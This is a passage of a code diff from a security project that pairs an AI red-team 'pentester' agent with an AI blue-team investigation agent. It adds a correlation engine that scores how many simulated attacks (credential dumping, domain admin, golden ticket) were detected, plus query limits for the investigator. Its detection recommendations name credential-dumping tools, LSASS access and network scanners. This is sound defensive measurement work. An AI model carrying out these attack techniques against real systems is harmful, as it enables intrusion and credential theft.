{description[:50]}...") - # Add a generous timeout (5 minutes per step) - timeout_seconds = self.max_steps * 300 # 5 minutes per step + def _generate_report(self, state: InvestigationState, _result) -> Path: + """Generate the markdown investigation report.""" + from ares.reports.investigation import MarkdownReportGenerator - result = await asyncio.wait_for( - agent.run(initial_prompt), - timeout=timeout_seconds, - ) + generator = MarkdownReportGenerator(self.report_dir) + return generator.generate(state) - logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}") + def _persist_investigation(self, state: InvestigationState, status: str) -> None: + """Persist investigation results for learning. - # Generate report - report_path = self._generate_report(state, result) + Args: + state: Investigation state to persist + status: Final status (completed, escalated, timeout, failed) + """ + try: + store = get_investigation_store() - dn.log_output("report_path", str(report_path)) - dn.log_metric("investigation_success", 1) + # Create stored investigation from state + stored = create_stored_investigation_from_state(state, status) - return { - "investigation_id": investigation_id, - "status": "completed" if not state.escalated else "escalated", - "report_path": str(report_path), - "evidence_count": len(state.evidence), - "techniques_identified": list(state.identified_techniques), - "highest_pyramid_level": state.highest_pyramid_level, - } + # Store the investigation + store.store_investigation(stored) - except asyncio.TimeoutError as timeout_err: - logger.error(f"Investigation timed out after {timeout_seconds}s") - logger.error( - f"Current state: {len(state.evidence)} evidence items, {len(state.timeline)} timeline events" - ) - dn.log_metric("investigation_timeout", 1) - raise TimeoutError( - f"Investigation exceeded {timeout_seconds}s timeout" - ) from timeout_err + # Update query effectiveness statistics + alert_name = state.alert.get("labels", {}).get("alertname", "unknown") + for query in state.executed_queries: + query_str = query.get("query", "") + if query_str: + # Normalize query for pattern matching + pattern = self._normalize_query_pattern(query_str) + successful = query.get("result_count", 0) > 0 + # Check if any evidence was recorded after this query + produced_evidence = len(state.evidence) > 0 - except Exception as e: - logger.error(f"Investigation failed: {e}") - dn.log_metric("investigation_failed", 1) - raise + store.update_query_effectiveness( + query_pattern=pattern, + successful=successful, + produced_evidence=produced_evidence, + alert_type=alert_name, + ) - def _generate_report(self, state: InvestigationState, _result) -> Path: - """Generate the markdown investigation report.""" - from ares.reports.investigation import MarkdownReportGenerator + logger.info(f"Persisted investigation {state.investigation_id} to store") - generator = MarkdownReportGenerator(self.report_dir) - return generator.generate(state) + except Exception as e: + # Don't fail the investigation if persistence fails + logger.warning(f"Failed to persist investigation: {e}") + + def _normalize_query_pattern(self, query: str) -> str: + """Normalize a query string into a reusable pattern. + + Replaces specific values with placeholders for pattern matching. + + Args: + query: Raw query string + + Returns: + Normalized pattern string + """ + import re + + pattern = query + + # Replace timestamps with placeholder + pattern = re.sub( + r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:\d{2})?", + "", + pattern, + ) + + # Replace IP addresses with placeholder + pattern = re.sub(r"\d+\.\d+\.\d+\.\d+", "", pattern) + + # Replace UUIDs with placeholder + pattern = re.sub( + r"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}", + "", + pattern, + flags=re.IGNORECASE, + ) + + # Replace specific hostnames (anything.domain.tld format) + return re.sub( + r"\b[a-z0-9-]+\.[a-z0-9-]+\.[a-z]{2,}\b", + "", + pattern, + flags=re.IGNORECASE, + ) diff --git a/src/ares/agents/red/pentester.py b/src/ares/agents/red/pentester.py index d976f3f1..f72a5daf 100644 --- a/src/ares/agents/red/pentester.py +++ b/src/ares/agents/red/pentester.py @@ -12,6 +12,7 @@ from ares.core.factories.red_factory import create_redteam_agent from ares.core.models import RedTeamState, Target +from ares.core.remote import SSOTokenExpiredError, validate_sso_credentials from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient from ares.reports.redteam import RedTeamReportGenerator @@ -87,6 +88,14 @@ async def execute_operation(self, target_ip: str) -> dict: logger.info(f"Starting red team operation {operation_id} against: {target_ip}") + # Validate SSO credentials before starting - fail fast if expired + try: + validate_sso_credentials() + logger.info("AWS SSO credentials validated successfully") + except SSOTokenExpiredError as e: + logger.error(f"Cannot start operation - {e}") + raise + # Create operation state state = RedTeamState( operation_id=operation_id, diff --git a/src/ares/core/correlation.py b/src/ares/core/correlation.py new file mode 100644 index 00000000..6c2e0358 --- /dev/null +++ b/src/ares/core/correlation.py @@ -0,0 +1,844 @@ +""" +Red-Blue Correlation Engine. + +Correlates red team attack activities with blue team detections +to measure detection coverage and identify gaps. +""" + +import re +from dataclasses import dataclass, field +from datetime import datetime, timedelta, timezone +from pathlib import Path +from typing import Any, ClassVar + +from loguru import logger + + +@dataclass +class RedTeamActivity: + """A single red team activity/action.""" + + timestamp: datetime + technique_id: str | None + technique_name: str | None + action: str + target_ip: str | None + target_host: str | None + credential_used: str | None + success: bool + metadata: dict[str, Any] = field(default_factory=dict) + + @property + def key(self) -> str: + """Generate a unique key for this activity.""" + return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.target_ip}" + + +@dataclass +class BlueTeamDetection: + """A blue team detection/alert.""" + + timestamp: datetime + alert_name: str + technique_id: str | None + severity: str + target_ip: str | None + target_host: str | None + investigation_id: str | None + status: str # completed, escalated, timeout + evidence_count: int + highest_pyramid_level: int + metadata: dict[str, Any] = field(default_factory=dict) + + @property + def key(self) -> str: + """Generate a unique key for this detection.""" + return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.alert_name}" + + +@dataclass +class CorrelationMatch: + """A match between red team activity and blue team detection.""" + + red_activity: RedTeamActivity + blue_detection: BlueTeamDetection + time_delta_seconds: float + technique_match: bool + target_match: bool + confidence: float + + @property + def match_quality(self) -> str: + """Assess the quality of this match.""" + if self.technique_match and self.target_match and abs(self.time_delta_seconds) < 300: + return "STRONG" + if self.technique_match and abs(self.time_delta_seconds) < 600: + return "GOOD" + if self.technique_match or (self.target_match and abs(self.time_delta_seconds) < 300): + return "WEAK" + return "TENUOUS" + + +@dataclass +class DetectionGap: + """An undetected red team activity.""" + + red_activity: RedTeamActivity + reason: str + recommended_detection: str | None = None + mitre_data_sources: list[str] = field(default_factory=list) + + +@dataclass +class CorrelationReport: + """Full correlation analysis report.""" + + analysis_timestamp: datetime + red_operation_id: str + time_window_start: datetime + time_window_end: datetime + + # Counts + total_red_activities: int + total_blue_detections: int + matched_activities: int + undetected_activities: int + false_positive_detections: int + + # Details + matches: list[CorrelationMatch] + gaps: list[DetectionGap] + false_positives: list[BlueTeamDetection] + + # Metrics + detection_rate: float + false_positive_rate: float + mean_time_to_detect: float | None # seconds + + # By technique + technique_coverage: dict[str, dict[str, Any]] + + def to_dict(self) -> dict[str, Any]: + """Convert report to dictionary.""" + return { + "analysis_timestamp": self.analysis_timestamp.isoformat(), + "red_operation_id": self.red_operation_id, + "time_window": { + "start": self.time_window_start.isoformat(), + "end": self.time_window_end.isoformat(), + }, + "summary": { + "total_red_activities": self.total_red_activities, + "total_blue_detections": self.total_blue_detections, + "matched_activities": self.matched_activities, + "undetected_activities": self.undetected_activities, + "false_positive_detections": self.false_positive_detections, + "detection_rate": f"{self.detection_rate * 100:.1f}%", + "false_positive_rate": f"{self.false_positive_rate * 100:.1f}%", + "mean_time_to_detect": f"{self.mean_time_to_detect:.1f}s" + if self.mean_time_to_detect + else "N/A", + }, + "technique_coverage": self.technique_coverage, + "matches": [ + { + "red_technique": m.red_activity.technique_id, + "red_action": m.red_activity.action[:100], + "blue_alert": m.blue_detection.alert_name, + "time_delta_seconds": m.time_delta_seconds, + "match_quality": m.match_quality, + "confidence": m.confidence, + } + for m in self.matches + ], + "gaps": [ + { + "technique": g.red_activity.technique_id, + "action": g.red_activity.action[:100], + "timestamp": g.red_activity.timestamp.isoformat(), + "reason": g.reason, + "recommended_detection": g.recommended_detection, + } + for g in self.gaps + ], + "false_positives": [ + { + "alert_name": fp.alert_name, + "technique": fp.technique_id, + "timestamp": fp.timestamp.isoformat(), + } + for fp in self.false_positives + ], + } + + +class RedBlueCorrelator: + """Correlates red team activities with blue team detections. + + This engine: + 1. Parses red team operation reports + 2. Parses blue team investigation reports + 3. Matches activities based on time, technique, and target + 4. Identifies detection gaps + 5. Calculates coverage metrics + """ + + # Time window for matching (activities within this window are considered related) + DEFAULT_TIME_WINDOW_MINUTES = 30 + + TECHNIQUE_PATTERNS: ClassVar[list[str]] = [ + r"T\d{4}(?:\.\d{3})?", # T1234 or T1234.001 + ] + + def __init__( + self, + reports_dir: Path, + time_window_minutes: int = DEFAULT_TIME_WINDOW_MINUTES, + ): + """Initialize the correlator. + + Args: + reports_dir: Directory containing red team and investigation reports + time_window_minutes: Time window for matching activities + """ + self.reports_dir = Path(reports_dir) + self.time_window = timedelta(minutes=time_window_minutes) + + def load_red_team_report(self, report_path: Path) -> tuple[str, list[RedTeamActivity]]: + """Load and parse a red team report. + + Args: + report_path: Path to the red team report markdown file + + Returns: + Tuple of (operation_id, list of activities) + """ + content = report_path.read_text() + activities = [] + + # Extract operation ID + operation_id_match = re.search(r"\*\*Operation ID\*\*:\s*(\S+)", content) + operation_id = operation_id_match.group(1) if operation_id_match else "unknown" + + # Extract target IP + target_ip_match = re.search(r"\*\*Target\*\*:\s*(\d+\.\d+\.\d+\.\d+)", content) + target_ip = target_ip_match.group(1) if target_ip_match else None + + # Extract start time + started_match = re.search(r"\*\*Started\*\*:\s*(.+?)(?:\n|$)", content) + if started_match: + try: + started_at = datetime.strptime( + started_match.group(1).strip(), "%Y-%m-%d %H:%M:%S UTC" + ).replace(tzinfo=timezone.utc) + except ValueError: + started_at = datetime.now(timezone.utc) + else: + started_at = datetime.now(timezone.utc) + + # Extract hosts discovered + hosts_section = re.search(r"### Hosts \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL) + if hosts_section: + host_count = int(hosts_section.group(1)) + if host_count > 0: + activities.append( + RedTeamActivity( + timestamp=started_at, + technique_id="T1046", # Network Service Discovery + technique_name="Network Service Discovery", + action=f"Discovered {host_count} host(s) via network scanning", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + # Extract credentials obtained + creds_section = re.search(r"### Credentials \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL) + if creds_section: + creds_content = creds_section.group(2) + + cred_matches = re.findall( + r"\*\*(\S+)\*\*\s*\n.*?Source:\s*(.+?)(?:\n|$)", creds_content + ) + for username, source in cred_matches: + activities.append( + RedTeamActivity( + timestamp=started_at + timedelta(minutes=1), # Slightly after start + technique_id="T1110" if "guessing" in source.lower() else "T1003", + technique_name="Credential Guessing" + if "guessing" in source.lower() + else "Credential Dumping", + action=f"Obtained credential for {username} via {source}", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + metadata={"username": username, "source": source}, + ) + ) + + # Extract MITRE techniques from timeline + timeline_section = re.search( + r"### Timeline of Key Events(.*?)(?=---|\Z)", content, re.DOTALL + ) + if timeline_section: + timeline_content = timeline_section.group(1) + event_matches = re.findall( + r"\|\s*([^|]+)\s*\|\s*([^|]+)\s*\|\s*(T\d{4}(?:\.\d{3})?)\s*\|", timeline_content + ) + for timestamp_str, description, technique_id in event_matches: + try: + event_time = datetime.fromisoformat( + timestamp_str.strip().replace("Z", "+00:00") + ) + except ValueError: + event_time = started_at + activities.append( + RedTeamActivity( + timestamp=event_time, + technique_id=technique_id.strip(), + technique_name=None, + action=description.strip(), + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + # Check for domain admin / golden ticket + if "Domain Admin Access**: ✓" in content or "has_domain_admin: true" in content.lower(): + activities.append( + RedTeamActivity( + timestamp=started_at + timedelta(minutes=5), + technique_id="T1078.002", + technique_name="Valid Accounts: Domain Accounts", + action="Achieved Domain Admin access", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + if "Golden Ticket**: ✓" in content or "has_golden_ticket: true" in content.lower(): + activities.append( + RedTeamActivity( + timestamp=started_at + timedelta(minutes=6), + technique_id="T1558.001", + technique_name="Golden Ticket", + action="Generated Golden Ticket for persistence", + target_ip=target_ip, + target_host=None, + credential_used=None, + success=True, + ) + ) + + logger.info(f"Loaded {len(activities)} activities from red team report {operation_id}") + return operation_id, activities + + def load_investigation_report(self, report_path: Path) -> BlueTeamDetection | None: + """Load and parse a blue team investigation report. + + Args: + report_path: Path to the investigation report markdown file + + Returns: + BlueTeamDetection object or None if parsing fails + """ + content = report_path.read_text() + + # Skip DatasourceNoData reports + if "DatasourceNoData" in report_path.name: + return None + + # Extract investigation ID + inv_id_match = re.search(r"\*\*Investigation ID:\*\*\s*`?(\S+?)`?(?:\n|$)", content) + investigation_id = inv_id_match.group(1) if inv_id_match else None + + # Extract alert name + alert_match = re.search(r"\|\s*Alert Name\s*\|\s*(.+?)\s*\|", content) + alert_name = alert_match.group(1).strip() if alert_match else "Unknown" + + # Extract severity + severity_match = re.search(r"\|\s*Severity\s*\|\s*(\w+)\s*\|", content) + severity = severity_match.group(1).strip() if severity_match else "unknown" + + # Extract timestamp from alert payload + starts_at_match = re.search(r'"startsAt":\s*"([^"]+)"', content) + if starts_at_match: + try: + timestamp = datetime.fromisoformat(starts_at_match.group(1).replace("Z", "+00:00")) + except ValueError: + timestamp = datetime.now(timezone.utc) + else: + # Try to extract from filename + date_match = re.search(r"(\d{8}_\d{6})", report_path.name) + if date_match: + try: + timestamp = datetime.strptime(date_match.group(1), "%Y%m%d_%H%M%S").replace( + tzinfo=timezone.utc + ) + except ValueError: + timestamp = datetime.now(timezone.utc) + else: + timestamp = datetime.now(timezone.utc) + + # Extract MITRE technique + technique_match = re.search(r"(T\d{4}(?:\.\d{3})?)", content) + technique_id = technique_match.group(1) if technique_match else None + + # Extract status + status_match = re.search(r"\|\s*Status\s*\|\s*(\w+)", content) + status = status_match.group(1).strip().lower() if status_match else "unknown" + + # Extract evidence count + evidence_match = re.search(r"\*\*Evidence Collected:\*\*\s*(\d+)", content) + evidence_count = int(evidence_match.group(1)) if evidence_match else 0 + + # Extract pyramid level + pyramid_match = re.search(r"\*\*Highest Pyramid Level:\*\*\s*(\d+)", content) + highest_pyramid_level = int(pyramid_match.group(1)) if pyramid_match else 0 + + # Extract target IP from content + ip_match = re.search(r"(\d+\.\d+\.\d+\.\d+)", content) + target_ip = ip_match.group(1) if ip_match else None + + return BlueTeamDetection( + timestamp=timestamp, + alert_name=alert_name, + technique_id=technique_id, + severity=severity, + target_ip=target_ip, + target_host=None, + investigation_id=investigation_id, + status=status, + evidence_count=evidence_count, + highest_pyramid_level=highest_pyramid_level, + ) + + def load_all_reports( + self, + ) -> tuple[list[tuple[str, list[RedTeamActivity]]], list[BlueTeamDetection]]: + """Load all reports from the reports directory. + + Returns: + Tuple of (list of (operation_id, activities), list of detections) + """ + red_team_reports = [] + blue_team_detections = [] + + for report_file in self.reports_dir.glob("*.md"): + if report_file.name.startswith("redteam-"): + try: + operation_id, activities = self.load_red_team_report(report_file) + red_team_reports.append((operation_id, activities)) + except Exception as e: + logger.warning(f"Failed to parse red team report {report_file}: {e}") + + elif report_file.name.startswith("investigation_"): + try: + detection = self.load_investigation_report(report_file) + if detection: + blue_team_detections.append(detection) + except Exception as e: + logger.warning(f"Failed to parse investigation report {report_file}: {e}") + + logger.info( + f"Loaded {len(red_team_reports)} red team reports, " + f"{len(blue_team_detections)} investigation reports" + ) + return red_team_reports, blue_team_detections + + def correlate( # noqa: PLR0912 + self, + red_activities: list[RedTeamActivity], + blue_detections: list[BlueTeamDetection], + operation_id: str = "unknown", + ) -> CorrelationReport: + """Correlate red team activities with blue team detections. + + Args: + red_activities: List of red team activities + blue_detections: List of blue team detections + operation_id: Red team operation ID + + Returns: + CorrelationReport with analysis results + """ + matches: list[CorrelationMatch] = [] + matched_red_keys: set[str] = set() + matched_blue_keys: set[str] = set() + + red_activities = sorted(red_activities, key=lambda x: x.timestamp) + blue_detections = sorted(blue_detections, key=lambda x: x.timestamp) + + if red_activities: + time_window_start = min(a.timestamp for a in red_activities) - self.time_window + time_window_end = max(a.timestamp for a in red_activities) + self.time_window + else: + time_window_start = datetime.now(timezone.utc) - timedelta(hours=1) + time_window_end = datetime.now(timezone.utc) + + # Match activities to detections + for red_activity in red_activities: + best_match: CorrelationMatch | None = None + best_confidence = 0.0 + + for detection in blue_detections: + time_delta = (detection.timestamp - red_activity.timestamp).total_seconds() + + if abs(time_delta) > self.time_window.total_seconds(): + continue + + technique_match = ( + red_activity.technique_id is not None + and detection.technique_id is not None + and red_activity.technique_id == detection.technique_id + ) + + target_match = ( + red_activity.target_ip is not None + and detection.target_ip is not None + and red_activity.target_ip == detection.target_ip + ) + + confidence = 0.0 + if technique_match: + confidence += 0.5 + if target_match: + confidence += 0.3 + # Time proximity bonus (closer = higher confidence) + time_bonus = max(0, 1 - abs(time_delta) / self.time_window.total_seconds()) * 0.2 + confidence += time_bonus + + if confidence > best_confidence: + best_confidence = confidence + best_match = CorrelationMatch( + red_activity=red_activity, + blue_detection=detection, + time_delta_seconds=time_delta, + technique_match=technique_match, + target_match=target_match, + confidence=confidence, + ) + + if best_match and best_match.confidence >= 0.3: + matches.append(best_match) + matched_red_keys.add(red_activity.key) + matched_blue_keys.add(best_match.blue_detection.key) + + # Identify detection gaps (undetected red activities) + gaps: list[DetectionGap] = [] + for activity in red_activities: + if activity.key not in matched_red_keys: + gap = DetectionGap( + red_activity=activity, + reason=self._determine_gap_reason(activity, blue_detections), + recommended_detection=self._recommend_detection(activity), + ) + gaps.append(gap) + + # Identify false positives (detections without matching red activity) + false_positives: list[BlueTeamDetection] = [] + for detection in blue_detections: + if ( + detection.key not in matched_blue_keys + and time_window_start <= detection.timestamp <= time_window_end + ): + false_positives.append(detection) + + total_red = len(red_activities) + matched_count = len(matches) + detection_rate = matched_count / total_red if total_red > 0 else 0.0 + + detections_in_window = len( + [d for d in blue_detections if time_window_start <= d.timestamp <= time_window_end] + ) + false_positive_rate = ( + len(false_positives) / detections_in_window if detections_in_window > 0 else 0.0 + ) + + time_deltas = [abs(m.time_delta_seconds) for m in matches if m.time_delta_seconds >= 0] + mean_ttd = sum(time_deltas) / len(time_deltas) if time_deltas else None + + technique_coverage = self._calculate_technique_coverage(red_activities, matches, gaps) + + return CorrelationReport( + analysis_timestamp=datetime.now(timezone.utc), + red_operation_id=operation_id, + time_window_start=time_window_start, + time_window_end=time_window_end, + total_red_activities=total_red, + total_blue_detections=len(blue_detections), + matched_activities=matched_count, + undetected_activities=len(gaps), + false_positive_detections=len(false_positives), + matches=matches, + gaps=gaps, + false_positives=false_positives, + detection_rate=detection_rate, + false_positive_rate=false_positive_rate, + mean_time_to_detect=mean_ttd, + technique_coverage=technique_coverage, + ) + + def _determine_gap_reason( + self, + activity: RedTeamActivity, + detections: list[BlueTeamDetection], + ) -> str: + """Determine why an activity was not detected.""" + if not activity.technique_id: + return "Activity has no associated MITRE technique" + + technique_alerts = [d for d in detections if d.technique_id == activity.technique_id] + if not technique_alerts: + return f"No alert rules configured for technique {activity.technique_id}" + + return "Alert exists but did not trigger within time window (possible log ingestion delay or query timeout)" + + def _recommend_detection(self, activity: RedTeamActivity) -> str | None: + """Recommend a detection for an undetected activity.""" + technique_recommendations = { + "T1046": "Add alert for network scanning patterns (nmap, masscan)", + "T1110": "Add alert for multiple failed authentication attempts", + "T1003": "Add alert for LSASS access or credential dumping tools", + "T1078.002": "Add alert for new domain admin group membership", + "T1558.001": "Add alert for krbtgt service ticket requests with RC4", + "T1021.002": "Add alert for remote SMB connections from unusual sources", + } + if activity.technique_id: + return technique_recommendations.get(activity.technique_id) + return None + + def _calculate_technique_coverage( + self, + activities: list[RedTeamActivity], + matches: list[CorrelationMatch], + gaps: list[DetectionGap], + ) -> dict[str, dict[str, Any]]: + """Calculate detection coverage per technique.""" + coverage: dict[str, dict[str, Any]] = {} + + for activity in activities: + if activity.technique_id: + if activity.technique_id not in coverage: + coverage[activity.technique_id] = { + "total": 0, + "detected": 0, + "missed": 0, + "detection_rate": 0.0, + } + coverage[activity.technique_id]["total"] += 1 + + for match in matches: + if match.red_activity.technique_id: + coverage[match.red_activity.technique_id]["detected"] += 1 + + for gap in gaps: + if gap.red_activity.technique_id: + coverage[gap.red_activity.technique_id]["missed"] += 1 + + for data in coverage.values(): + if data["total"] > 0: + data["detection_rate"] = data["detected"] / data["total"] + + return coverage + + def generate_report_markdown(self, report: CorrelationReport) -> str: # noqa: PLR0912 + """Generate a markdown report from correlation results. + + Args: + report: CorrelationReport object + + Returns: + Markdown formatted report string + """ + lines = [ + "# Red-Blue Correlation Report", + "", + f"**Analysis Time:** {report.analysis_timestamp.strftime('%Y-%m-%d %H:%M:%S UTC')}", + f"**Red Team Operation:** {report.red_operation_id}", + f"**Time Window:** {report.time_window_start.strftime('%Y-%m-%d %H:%M')} to {report.time_window_end.strftime('%Y-%m-%d %H:%M')}", + "", + "---", + "", + "## Executive Summary", + "", + "| Metric | Value |", + "|--------|-------|", + f"| Red Team Activities | {report.total_red_activities} |", + f"| Blue Team Detections | {report.total_blue_detections} |", + f"| Matched (Detected) | {report.matched_activities} |", + f"| Detection Gaps | {report.undetected_activities} |", + f"| False Positives | {report.false_positive_detections} |", + f"| **Detection Rate** | **{report.detection_rate * 100:.1f}%** |", + f"| False Positive Rate | {report.false_positive_rate * 100:.1f}% |", + f"| Mean Time to Detect | {f'{report.mean_time_to_detect:.0f}s' if report.mean_time_to_detect else 'N/A'} |", + "", + ] + + # Detection rate assessment + if report.detection_rate >= 0.8: + assessment = "EXCELLENT - Blue team is detecting most red team activities" + elif report.detection_rate >= 0.6: + assessment = "GOOD - Majority of activities detected, some gaps remain" + elif report.detection_rate >= 0.4: + assessment = "MODERATE - Significant detection gaps exist" + else: + assessment = "POOR - Most red team activities went undetected" + + lines.extend( + [ + f"### Assessment: {assessment}", + "", + "---", + "", + ] + ) + + # Technique coverage + if report.technique_coverage: + lines.extend( + [ + "## Technique Coverage", + "", + "| Technique | Total | Detected | Missed | Rate |", + "|-----------|-------|----------|--------|------|", + ] + ) + for tech_id, data in sorted(report.technique_coverage.items()): + rate_str = f"{data['detection_rate'] * 100:.0f}%" + rate_emoji = ( + "✅" + if data["detection_rate"] >= 0.8 + else "⚠️" + if data["detection_rate"] >= 0.5 + else "❌" + ) + lines.append( + f"| {tech_id} | {data['total']} | {data['detected']} | {data['missed']} | {rate_emoji} {rate_str} |" + ) + lines.extend(["", "---", ""]) + + # Successful detections + if report.matches: + lines.extend( + [ + "## Successful Detections", + "", + "| Red Activity | Blue Alert | Time Delta | Quality |", + "|--------------|------------|------------|---------|", + ] + ) + for match in report.matches[:20]: # Limit to 20 + lines.append( + f"| {match.red_activity.technique_id or 'N/A'}: {match.red_activity.action[:40]}... | " + f"{match.blue_detection.alert_name[:30]}... | " + f"{match.time_delta_seconds:.0f}s | " + f"{match.match_quality} |" + ) + lines.extend(["", "---", ""]) + + # Detection gaps + if report.gaps: + lines.extend( + [ + "## Detection Gaps (Undetected Activities)", + "", + "| Technique | Activity | Reason | Recommendation |", + "|-----------|----------|--------|----------------|", + ] + ) + for gap in report.gaps[:20]: # Limit to 20 + lines.append( + f"| {gap.red_activity.technique_id or 'N/A'} | " + f"{gap.red_activity.action[:40]}... | " + f"{gap.reason[:40]}... | " + f"{gap.recommended_detection or 'N/A'} |" + ) + lines.extend(["", "---", ""]) + + # False positives + if report.false_positives: + lines.extend( + [ + "## False Positives (Detections without Red Activity)", + "", + "| Alert | Technique | Time |", + "|-------|-----------|------|", + ] + ) + for fp in report.false_positives[:10]: # Limit to 10 + lines.append( + f"| {fp.alert_name[:40]}... | {fp.technique_id or 'N/A'} | {fp.timestamp.strftime('%H:%M:%S')} |" + ) + lines.extend(["", "---", ""]) + + # Recommendations + lines.extend( + [ + "## Recommendations", + "", + ] + ) + + if report.gaps: + # Group recommendations by technique + recommendations = {} + for gap in report.gaps: + if gap.recommended_detection: + tech = gap.red_activity.technique_id or "General" + if tech not in recommendations: + recommendations[tech] = gap.recommended_detection + + for i, (tech, rec) in enumerate(recommendations.items(), 1): + lines.append(f"{i}. **{tech}**: {rec}") + + if report.detection_rate < 0.8: + lines.extend( + [ + "", + "### General Improvements", + "- Review query timeout issues in Loki/Grafana", + "- Ensure log ingestion latency is < 60 seconds", + "- Add missing detection rules for uncovered techniques", + "- Consider increasing alert rule evaluation frequency", + ] + ) + + lines.extend( + [ + "", + "---", + "", + "*Report generated by Ares Red-Blue Correlation Engine*", + ] + ) + + return "\n".join(lines) + + def run_full_analysis(self) -> list[CorrelationReport]: + """Run correlation analysis on all reports in the directory. + + Returns: + List of CorrelationReport objects, one per red team operation + """ + red_reports, blue_detections = self.load_all_reports() + + reports = [] + for operation_id, activities in red_reports: + report = self.correlate(activities, blue_detections, operation_id) + reports.append(report) + + # Generate and save markdown report + markdown = self.generate_report_markdown(report) + report_path = self.reports_dir / f"correlation_{operation_id}.md" + report_path.write_text(markdown) + logger.success(f"Generated correlation report: {report_path}") + + return reports diff --git a/src/ares/core/factories/blue_factory.py b/src/ares/core/factories/blue_factory.py index 39022545..bb64d903 100644 --- a/src/ares/core/factories/blue_factory.py +++ b/src/ares/core/factories/blue_factory.py @@ -1,84 +1,444 @@ """Factory for creating investigation agents with presets.""" +import functools +from typing import Any + import dreadnode as dn from dreadnode.agent import Agent -from dreadnode.agent.events import AgentStalled, ToolEnd, ToolStart +from dreadnode.agent.events import AgentEvent, AgentStalled, ToolEnd, ToolStart from dreadnode.agent.hooks import retry_with_feedback -from dreadnode.agent.stop import tool_use +from dreadnode.agent.stop import StopCondition, tool_use from dreadnode.agent.thread import Thread from loguru import logger from ares.core.models import InvestigationState +from ares.core.query_resilience import QueryResilientExecutor, get_resilient_executor from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient from ares.tools.blue import ( CompletionTools, GrafanaTools, InvestigationTools, + LearningTools, + QueryTemplateTools, QuestionEngineTools, escalate_investigation, ) from ares.tools.shared import MITRELookupTools -# Load system instructions from template SYSTEM_INSTRUCTIONS = get_template_loader().render("agent/system_instructions.md.jinja") -# Track consecutive query calls without workflow progress -_consecutive_queries = [] +# Track query calls - reset per investigation via reset_query_tracking() +_total_queries = 0 +_consecutive_queries: list[str] = [] +_query_limit_hit = False +_executed_queries: list[dict] = [] +_seen_queries: dict[str, int] = {} # Track query -> count to detect loops +_current_state: "InvestigationState | None" = None +MAX_QUERIES_PER_INVESTIGATION = 5 +MAX_QUERIES_CRITICAL = 8 # Higher limit for critical alerts +MAX_DUPLICATE_QUERIES = 2 # Max times same query can run before blocking + + +def reset_query_tracking(): + """Reset query tracking for a new investigation.""" + from ares.core.query_resilience import reset_resilient_executor + + global \ + _total_queries, \ + _consecutive_queries, \ + _query_limit_hit, \ + _executed_queries, \ + _seen_queries, \ + _current_state + _total_queries = 0 + _consecutive_queries = [] + _query_limit_hit = False + _executed_queries = [] + _seen_queries = {} + _current_state = None + reset_resilient_executor() + + +def set_investigation_state(state: "InvestigationState"): + """Set the current investigation state for query recording.""" + global _current_state + _current_state = state + + +def _get_query_limit() -> int: + """Get the query limit based on alert severity.""" + if _current_state: + severity = _current_state.alert.get("labels", {}).get("severity", "").lower() + if severity == "critical": + return MAX_QUERIES_CRITICAL + return MAX_QUERIES_PER_INVESTIGATION + + +def _check_query_limit() -> str | None: + """Check if query limit is reached. Returns error message if limit hit, None otherwise.""" + global _query_limit_hit + limit = _get_query_limit() + if _query_limit_hit or _total_queries >= limit: + _query_limit_hit = True + return ( + f"🛑 QUERY LIMIT REACHED ({_total_queries}/{limit}). You have exceeded the maximum number of queries.\n\n" + "You MUST call complete_investigation(summary='...', attack_synopsis='...', recommendations=[...]) NOW.\n\n" + "Summarize what you found from previous queries and complete the investigation.\n" + "Do NOT attempt any more queries - they will all be blocked.\n\n" + "REMEMBER: Include attack_synopsis (narrative of what happened) and recommendations (list of actions).\n\n" + "Example:\n" + "complete_investigation(\n" + " summary='Investigated [alert name]. Found [evidence/no evidence]. Confidence: [level].',\n" + " attack_synopsis='At [time], [user/IP] performed [action] against [target]...',\n" + " recommendations=['Reset compromised passwords', 'Block source IP', ...]\n" + ")" + ) + return None + + +def _check_duplicate_query(query: str) -> str | None: + """Check if query is a duplicate. Returns error message if duplicate limit hit.""" + # Normalize query for comparison (strip whitespace, lowercase) + normalized = query.strip().lower() + + count = _seen_queries.get(normalized, 0) + if count >= MAX_DUPLICATE_QUERIES: + logger.warning(f"🔁 Duplicate query blocked (run {count + 1} times): {query[:100]}...") + return ( + f"🔁 DUPLICATE QUERY BLOCKED. You've already run this query {count} times.\n\n" + "**DO NOT re-run the same query.** Instead:\n\n" + "1. **PARSE THE RESULTS** you already received\n" + "2. **EXTRACT IOCs** from the JSON:\n" + " - Look for 'computer' field → record as hostname\n" + " - Look for 'TargetUserName' in event_data → record as user\n" + " - Look for 'IpAddress' in event_data → record as IP\n" + "3. **CALL record_evidence()** for each IOC found\n" + "4. **Then try a DIFFERENT query** or call complete_investigation()\n\n" + "Example extraction from previous results:\n" + "```\n" + "record_evidence(evidence_type='hostname', value='winterfell.north.sevenkingdoms.local', ...)\n" + "record_evidence(evidence_type='user', value='robb.stark', ...)\n" + "```" + ) + + # Increment count + _seen_queries[normalized] = count + 1 + return None + + +def _increment_query_count(tool_name: str): + """Increment query counter and log.""" + global _total_queries + _total_queries += 1 + _consecutive_queries.append(tool_name) + if len(_consecutive_queries) > 5: + _consecutive_queries.pop(0) + limit = _get_query_limit() + logger.info(f"📊 Query count: {_total_queries}/{limit}") + + +def _record_query(tool_name: str, kwargs: dict, result_count: int | None = None): + """Record a query to the investigation state.""" + from datetime import datetime, timezone + + query_record = { + "type": tool_name, + "query": kwargs.get("logql") or kwargs.get("expr") or str(kwargs), + "timestamp": datetime.now(timezone.utc).isoformat(), + "result_count": result_count, + "datasource": kwargs.get("datasourceUid", "unknown"), + } + _executed_queries.append(query_record) + + if _current_state: + 